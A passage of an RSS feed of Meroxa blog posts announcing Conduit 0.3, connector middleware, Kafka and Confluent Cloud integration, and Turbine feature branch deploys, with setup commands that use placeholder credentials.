	destination &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	middleware &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DestinationMiddleware&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DestinationWithBatch&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; DefaultBatchSize&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DestinationWithMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;destination&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; middleware&lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;With the introduction of a connector middleware we intend to make the connector developer experience even nicer and simpler. Connector developers can utilize middleware provided by the SDK to enrich the functionality of their connectors without reinventing the wheel. Even Conduit users will benefit from the middleware, as the functionality provided by a middleware will work the same way across all connectors.&lt;/p&gt;
&lt;p&gt;If this got you interested in &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; don’t hesitate to join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; and say hello! We invite you to give &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; a try and let us know what you like and don’t like. Our mission is to make Conduit the go-to tool for data integration and your feedback can help us reach that goal!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Announcing Conduit 0.3]]></title><description><![CDATA[Conduit is a tool that helps developers move data within their infrastructure to the places they’re needed. ]]></description><link>https://meroxa.com/blog/announcing-conduit-0.3</link><guid isPermaLink="false">https://meroxa.com/blog/announcing-conduit-0.3</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 27 Sep 2022 14:53:25 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.3 is here! Conduit is a tool that helps developers move data within their infrastructure to the places they’re needed.&lt;/p&gt;
&lt;p&gt;Getting started is easy as downloading Conduit from the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.3.0&quot;&gt;Releases page&lt;/a&gt; on GitHub and running:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;What’s New&lt;/h2&gt;
&lt;h3&gt;OpenCDC - Consistency in Payloads&lt;/h3&gt;
&lt;p&gt;One of the biggest pieces of work in this release is Conduit’s support for &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol/blob/main/proto/opencdc/v1/opencdc.proto&quot;&gt;OpenCDC&lt;/a&gt;. A gripe that we hear about production data integration tools is that the formats for Change Data Capture (CDC) can be all over the place even between connectors within the same tool! The downstream impact is that developers then need to code toward specific connectors. OpenCDC provides high-level guarantees on the format that you can expect from any connector that has CDC support in Conduit.&lt;img src=&quot;https://lh6.googleusercontent.com/MAjJjDjIr357veO0ZfMuY4dq3kXC1MRotw4JXoiXOndved2d9DRnpxUkzFWzE3v1ihM7j6mC8e6J5jTNjKTh_EV8H7Ds4mVv5st5iQzrT8IRrWJRn9dbGAqcR7TYnkPXubtskN7gsyMov5GDfDpOszO0BrtMw2zdIRVbTu99mEsbOLBoo3z5VYefGw&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;OpenCDC represents a breaking change in Conduit’s Connector SDK. This means that any connector that hasn’t been updated to work with 0.3 will only work with 0.2. We’ve updated the &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/connectors.md&quot;&gt;connector list&lt;/a&gt; in the Conduit repo to reflect which connectors are ready for OpenCDC. You can check out this &lt;a href=&quot;https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture&quot;&gt;blog post&lt;/a&gt; to learn more about OpenCDC.&lt;/p&gt;
&lt;h3&gt;Create Pipelines with a Pipeline Config File&lt;/h3&gt;
&lt;p&gt;In some production situations, you might not want to orchestrate pipelines via an API or a UI. If your data stores don’t change all that much, a &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/pipeline_configuration_files.md&quot;&gt;static file&lt;/a&gt; might be the best way to configure a pipeline. With the release of the Pipeline Config File feature, you have the ability to use `yaml` to configure pipelines. The added benefit of this feature is that you can put the file in source control and have more measured changes to any of your pipelines.&lt;img src=&quot;https://lh6.googleusercontent.com/uKSmOS9d7Dx0QHKT6J7BJrRsTE1cwMYA0zQ2wOcmf0hnP1xt8mV3Q9t26dJ7y_54urPyRZk-Y8pTMW2HuyBtIPVblDtcwmzCARFqLyhvOytGvjeuCnKE439hVD1xyhfiij-TzzY07IU01JuDjzGwDRo6Na7UiYsUUClKfBIo1we90hLj8v3GVdnSlw&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h3&gt;JavaScript Processors&lt;/h3&gt;
&lt;p&gt;Imagine a scenario where you need to drop personally identifiable information before any data reaches less sensitive downstream systems. The best way to do this would be to attach some code to the pipeline. In Conduit 0.3, it’s now possible to use Javascript to transform data. Javascript is the first language that we’re supporting but we plan to provide support for more languages over time. Don’t worry, Conduit does not have an external dependency on Node. Conduit uses &lt;a href=&quot;https://github.com/dop251/goja&quot;&gt;goja&lt;/a&gt; to make this possible.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/processors.md&quot;&gt;Processors&lt;/a&gt; can be injected after data comes from a source connector, during the pipeline itself, or before the data goes to a destination connector. The best way to build processors is to include them as part of your pipeline configuration file like so:&lt;img src=&quot;https://lh6.googleusercontent.com/xFmkpl-7bwE8CCsLrTMPBLpBQ1ffrlSSgFQLDSoHSKHMli6ZP65PcayNktWawtrfmEMueQSaYj9o7ysydagZDtnITy8b9-d3fn4MAy8YOsSOLAE2TYQq1sOk90Fp_Plf3F1dqDpX1e1NtZnfNSxm1QqDr3xlG8wU8bD9mHqJeFcNC_3c2lE_xqvHBA&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;Processors can also be created as part of an API call to Conduit. This is great in cases where you’re building pipelines programmatically as part of your internal processes or even your own product!&lt;/p&gt;
&lt;h3&gt;And So Much More&lt;/h3&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.3.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. This blog post only covers a fraction of what was included. In the coming weeks, we’ll be releasing more blog posts on topics like the performance benchmarks of Conduit 0.3 and connector middleware.&lt;/p&gt;
&lt;p&gt;The Conduit team would love to hear about how you’re using Conduit in your setup. Please hit us up on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;, or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Bringing Continuous Delivery to Kafka & Streaming Data Apps]]></title><description><![CDATA[Bringing continuous delivery to Kafka and streaming data apps with Apache Kafka Connector and Feature Branch Deploys.]]></description><link>https://meroxa.com/blog/bringing-continuous-delivery-to-kafka-streaming-data-apps</link><guid isPermaLink="false">https://meroxa.com/blog/bringing-continuous-delivery-to-kafka-streaming-data-apps</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 14 Sep 2022 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Writing applications against streaming or event-driven data is an incredible challenge. Developers are beholden to upstream schemas or have to write a considerable amount of plumbing with streaming systems before getting to the value-add work of their applications. In web development, developers are in control of their schemas. Any time a new feature is built that needs to persist some data, the developer writes a change to the schema and deploys it when they choose to. For streaming applications, the developers aren’t in control. They’re at the mercy of whatever upstream system or process generates the data.&lt;/p&gt;
&lt;p&gt;Today we’re happy to announce two new features to the Meroxa platform that aim to make developing against streaming data easier. First, is the Apache Kafka Connector. The concepts and paradigms for streaming data started with Apache Kafka. The second feature is Feature Branch Deploys for streaming data applications. The ability to test a streaming application against staging and a copy of production data is critical. This gives developers the confidence that their changes, once merged to the `main` branch and deployed to production, will work as expected.&lt;/p&gt;
&lt;h3&gt;Apache Kafka Connector&lt;/h3&gt;
&lt;p&gt;Many streaming applications start with the core infrastructure of Apache Kafka. Its ability to allow developers to produce and consume data to any number of systems or streaming applications is what’s made it successful. Part of the challenge for any developer learning to build apps off of Apache Kafka is all the new streaming paradigms between delivery semantics and partitions, just to name a few. With support for Apache Kafka on Meroxa, as a source and a destination, it’s never been easier to focus on the business logic instead of all of the plumbing. Check out the feature launch &lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;blog post&lt;/a&gt; for more details. Support for producing and consuming from Apache Kafka is just the beginning as we work toward the goal of enabling developers to focus on value-add development instead of plumbing.&lt;/p&gt;
&lt;h3&gt;Feature Branch Deploys&lt;/h3&gt;
&lt;p&gt;Feature Branch Deploys is the first step on a path to enabling modern continuous delivery practices for streaming data applications. Writing unit and integration tests are important when building any application whether that’s for the web or streaming data applications. They let you know if what you’ve built meets your requirements and expectations. That level of testing is already possible when building Turbine streaming data apps. Nothing compares to taking what you’ve built and testing it against staging or production data. After all, data is what drives streaming applications.&lt;/p&gt;
&lt;p&gt;Any time you have a branch in your Turbine application, you’ll be able to deploy that branch directly to Meroxa. Meroxa will do the work of sending the data you want to your application to consume, making sure that it doesn’t impact the production version of the application. Check out our &lt;a href=&quot;https://meroxa.com/blog/turbine-feature-branch-deploys&quot;&gt;write-up on Feature Branch Deploys&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Get Started with Meroxa&lt;/h3&gt;
&lt;p&gt;Both features are available today on the Meroxa platform. Get started by creating your own Turbine streaming data application and let us know what you’re building! We’d love to hear about it, so don&apos;t forget to share with us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt; or in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord community&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New Integration Resources: Apache Kafka and Confluent Cloud]]></title><description><![CDATA[We are taking an important step towards helping customers build data applications with support for Apache Kafka as a resource on Meroxa. ]]></description><link>https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud</link><guid isPermaLink="false">https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Wed, 14 Sep 2022 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Behind every streaming application exists a combination of data and events. With the rising popularity and complexity of event-driven and streaming architectures,&lt;a href=&quot;https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps&quot;&gt;data applications&lt;/a&gt; offer developers a powerful solution. Data applications are centered around real-time or near real-time events which is key for a lot of modern data processing applications. Today, we are taking an important step towards helping customers build data applications with support for Apache Kafka as a resource on Meroxa.&lt;/p&gt;
&lt;p&gt;Apache Kafka is an open-source streaming platform maintained by the Apache Software Foundation and since its creation in 2011, Kafka has evolved from a messaging queue to a robust event streaming platform. Confluent Cloud is a fully managed, cloud-native Kafka service for connecting and processing all of your data, everywhere it’s needed, founded by the original Kafka developers who ran the service at massive scale while at LinkedIn. Apache Kafka and Confluent Cloud can now be added as a resource on the Meroxa Platform with just a few steps. Adding support for producing and consuming Apache Kafka Topics and Streams is only the beginning as we continue to make data apps easier to build for developers.&lt;/p&gt;
&lt;h1&gt;Getting Started&lt;/h1&gt;
&lt;p&gt;Kafka is a distributed system consisting of servers and clients that communicate via a high-performance TCP network protocol. In Kafka, a &lt;strong&gt;Topic&lt;/strong&gt; is a category/name used to store and publish records similar to tables in a database. The server that the topics are hosted on is called a &lt;strong&gt;Broker&lt;/strong&gt; and a &lt;strong&gt;Cluster&lt;/strong&gt; typically consists of multiple brokers working together to provide scale and reliability. &lt;strong&gt;Bootstrap servers&lt;/strong&gt; contain the host and port pair that represent the address of the broker.&lt;/p&gt;
&lt;p&gt;In the following examples, we will walk you through the steps necessary to add Apache Kafka as a resource on the Meroxa Platform.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Apache Kafka&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To connect to Apache Kafka, you need an Apache Kafka server. Refer to Apache Kafka &lt;a href=&quot;https://developer.confluent.io/quickstart/kafka-on-confluent-cloud/&quot;&gt;https://kafka.apache.org/quickstart&lt;/a&gt; to create one.&lt;/p&gt;
&lt;h3&gt;Prerequisites&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Bootstrap server information available in the &lt;code class=&quot;language-text&quot;&gt;server.properties&lt;/code&gt; file&lt;/li&gt;
&lt;li&gt;Username and Password available in the &lt;code class=&quot;language-text&quot;&gt;KafkaServer&lt;/code&gt; section in the JAAS file&lt;/li&gt;
&lt;li&gt;The Certificate Authority (CA) file, the client certificate, and the client key if Secure Sockets Layer (SSL) encryption is used.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.&lt;/p&gt;
&lt;h3&gt;Meroxa CLI&lt;/h3&gt;
&lt;p&gt;In the CLI, use the &lt;code class=&quot;language-text&quot;&gt;Meroxa resource create&lt;/code&gt; command to configure your Apache Kafka resource.&lt;/p&gt;
&lt;p&gt;The following example depicts how this command is used to create an Apache Kafka resource named apachekafka with the minimum configuration required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; kafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the example above, replace the following variables with valid credentials from your Apache Kafka environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;$USERNAME - Apache Kafka Username
$PASSWORD - Apache Kafka Password
$BOOTSTRAP_SERVER -  Host and Port of the Kafka broker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For additional configuration and information on how to add Apache Kafka Resource, check out the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/apachekafka&quot;&gt;Apache Kafka Resource documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;MEROXA DASHBOARD&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/apache%20kafka.jpg&quot; alt=&quot;apache kafka&quot;&gt;&lt;/p&gt;
&lt;p&gt;Combine the username, password, and bootstrap server information to construct a Connection URL in the following format:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you’re using Secure Sockets Layer (SSL) encryption then you can toggle the Establish a trusted connection and input The Certificate Authority (CA) file, the client certificate, and the client key.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Confluent Cloud&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To connect to Confluent Cloud Apache Kafka, you need to have a Kafka cluster. Refer to Confluent’s &lt;a href=&quot;https://developer.confluent.io/quickstart/kafka-on-confluent-cloud/&quot;&gt;quickstart guide&lt;/a&gt; to create one.&lt;/p&gt;
&lt;h3&gt;Prerequisites:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;API key (Follow the [guide](&lt;a href=&quot;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster%5D(https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster)&quot;&gt;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster)&lt;/a&gt; to set up your API keys.)&lt;/li&gt;
&lt;li&gt;API secret (this can be found with API key)&lt;/li&gt;
&lt;li&gt;Bootstrap Server (Refer to your [Cluster settings](&lt;a href=&quot;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details%5D(https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details)&quot;&gt;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details)&lt;/a&gt; to retrieve the Bootstrap Server. )&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.&lt;/p&gt;
&lt;h3&gt;CLI&lt;/h3&gt;
&lt;p&gt;Use the &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; command to configure your Confluent Cloud resource.&lt;/p&gt;
&lt;p&gt;The following example depicts how this command is used to create a Confluent Cloud resource named &lt;code class=&quot;language-text&quot;&gt;confluentcloud&lt;/code&gt; with the minimum configuration required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create confluentcloud &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; confluentcloud &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;kafka+sasl+ssl://&amp;lt;API_KEY&gt;:&amp;lt;API_SECRET&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the example above, replace the following variables with valid credentials from your Confluent Cloud Cloud Console:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;$API_KEY - Cluster API Key
$API_SECRET - Cluster API Secret
$BOOTSTRAP_SERVER -  Host and Port of the Cluster&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For additional information on how to add Confluent Cloud Resource, check out the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/confluentcloud&quot;&gt;Confluent Cloud Resource documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;DASHBOARD&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/confluentcloud.jpg&quot; alt=&quot;confluentcloud&quot;&gt;&lt;/p&gt;
&lt;p&gt;Input the API Key, API Secret, and Bootstrap Server information into the corresponding fields to add a Confluent Cloud Kafka resource.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Things to know&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;With Kafka, you can pick a data format of your choice. It’s important to be consistent across your usage when using Kafka upstream to any downstream resources. Currently, Meroxa only supports JSON.&lt;/li&gt;
&lt;li&gt;Meroxa uses SASL/PLAIN configuration to authenticate with Kafka. SASL/PLAIN is a simple username/password authentication mechanism that is typically used with TLS for encryption to implement secure authentication)&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine Feature Branch Deploys]]></title><description><![CDATA[Data apps may undergo several code changes during the development lifecycle. Feature branches allow developers to branch off the main or production instance of the data app code without impacting production code.]]></description><link>https://meroxa.com/blog/turbine-feature-branch-deploys</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-feature-branch-deploys</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Wed, 14 Sep 2022 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa we have committed to delivering exceptional developer experiences. Today, we are excited to introduce feature branch deploys—a first step toward enabling continuous delivery for Turbine data applications on the Meroxa Platform.&lt;/p&gt;
&lt;p&gt;Data applications may undergo several code changes by one or many developers throughout the development lifecycle. Using feature branches, contributing developers can effectively branch off the &lt;code class=&quot;language-text&quot;&gt;main&lt;/code&gt; or production instance of their data application code. This allows them to further develop and test changes without impacting production code.&lt;/p&gt;
&lt;p&gt;Deploying from feature branches enables developers to test the outcomes of their code directly against production data—a crucial step before merging and deploying their code to the production instance of their data application.&lt;/p&gt;
&lt;h2&gt;Deploying from a feature branch&lt;/h2&gt;
&lt;p&gt;In the following examples, we will walk you through the steps necessary to deploy a Turbine data application from a feature branch.&lt;/p&gt;
&lt;h3&gt;Create a feature branch&lt;/h3&gt;
&lt;p&gt;First, create a feature branch and name it something descriptive. The name you chose for your feature branch will automatically append to the end of your application name when deployed to Meroxa. This will help identify test instances to production instances of your Turbine data applications.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; checkout &lt;span class=&quot;token parameter variable&quot;&gt;-b&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;transform&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Switched to a new branch &apos;transform&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once a feature branch is checked out, you are ready to launch your code editor and begin making changes. When using feature branch deploys to test, we recommend you carefully review your Turbine code to ensure the appropriate data resources are used for testing. We recommend swapping out any downstream production data resources with test resources. This will help prevent any unintended updates to production data.&lt;/p&gt;
&lt;p&gt;🎈 &lt;strong&gt;Note:&lt;/strong&gt; Testing resources must be created and configured on Meroxa to be accessible to your Turbine data app test instances.&lt;/p&gt;
&lt;h3&gt;Commit your changes&lt;/h3&gt;
&lt;p&gt;Next, commit your code to prepare for deployment. Be sure to look over your Turbine code before committing your changes. It is also good to ensure you’re on the correct branch, you can check this by running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; branch&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  main
* transform&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once you’ve confirmed you’re in the correct branch, commit your code with the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anonymize PII field&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;[transform 1a1234b] Anonymize PII field
1 file changed, 1 insertion(+), 1 deletion(-)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Deploy&lt;/h3&gt;
&lt;p&gt;Once the code is committed, you’re ready to deploy. Simply run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application &quot;users-transform&quot; (golang) for deployment...
  ✔ Application built!
✔ Can access your Turbine resources
  ✔ Application processes found. Creating application image...
  ✔ Platform source fetched
✔ Dockerfile created
  ⠋ Creating &quot;/Users/local/path/users&quot; in &quot;turbine-users-transform.tar.gz&quot;
  ✔ &quot;turbine-users-transform.tar.gz&quot; successfully created in &quot;/Users/local/path/users&quot;
  ✔ Source uploaded
  ✔ Removed &quot;turbine-users-transform.tar.gz&quot;
  ⠋Removing Dockerfile created for your application in /Users/local/path/users
  ✔ Dockerfile removed
  ✔ Successfully built Process image! (&quot;UUID&quot;)
  ✔ Deploy complete!
  ✔ Application &quot;users-transform&quot; successfully created!
  
